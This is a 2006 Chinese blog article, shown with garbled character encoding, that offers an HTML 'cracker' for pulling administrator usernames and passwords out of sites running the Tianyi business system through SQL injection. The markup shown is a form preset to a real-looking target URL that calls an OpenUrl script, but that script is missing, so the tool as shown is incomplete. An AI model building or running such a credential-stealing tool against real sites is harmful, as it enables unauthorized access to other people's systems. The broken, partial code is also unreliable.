快捷導(dǎo)航

天意商務(wù)系統(tǒng)后臺管理帳號破解html版

更新時間：2006年10月24日 00:00:00 作者：

/**
慈勤強
http://blog.csdn.net/cqq
*/
自從上次寫了個天意商務(wù)系統(tǒng)破解程序之后，
收到了不少朋友的來信，
有詢問程序原理的，有詢問如何防護的。
今天，我抽了一點時間，做了這個Html版，就只有這一個htm文件
相信有點html知識和SQL Injection知識的朋友都能夠看懂
原理非常簡單，破解用戶帳號是用的SQL Injection方法，
因為這套系統(tǒng)好多地方存在sql injection漏洞，
然后自己下載個這套系統(tǒng)，就可以很方便的找出問題了。
以前是Vc++版本，現(xiàn)在是html版本，不過都是一樣，
就是通過http協(xié)議取得網(wǎng)頁的源文件
然后分析源文件，找到用戶名和密碼
并且顯示出來。
下面是源代碼，大家只要把這個文件保存到硬盤上，起名叫ty.htm，就可以了。

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>天意商務(wù)系統(tǒng)后臺管理帳號破解html版--慈勤強制作</title>  <style type="text/css">  </style></head> <body>  <table width="600" border="1" align="center" cellpadding="2" cellspacing="0" bordercolor="#D4D4D4" bgcolor="#E4E4E4">   <tr>     <td width="39%">天意商務(wù)系統(tǒng)后臺管理帳號破解html版</td>     <td align="right">Powered By Steven_Cee <a href="Http://blog.csdn.net/cqq" target="_blank">Http://blog.csdn.net/cqq</a> </td>   </tr> </table>  <table width="600" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td> <form name="frmCqq" method="post"> <input name="url" type="text" value="http://www.3shopok.net" size="44"> <input type="button" name="submit" value="提交" onClick="vbscript:OpenUrl(window.frmCqq.url.value)"> </form>  </td>   </tr> </table> <table width="600" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td width="20">&nbsp;  </td>     <td><span id="cqqadmin"></span></td>   </tr> </table> <table width="600" border="1" align="center" cellpadding="1" cellspacing="0" bordercolor="#E4E4E4" bgcolor="#E4E4E4">   <tr>     <td align="center">幫助說明，請看 </td>   </tr> </table> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </body> </html>

[Ctrl+A 全選注:引入外部Js需再刷新一下頁面才能執(zhí)行]

您可能感興趣的文章: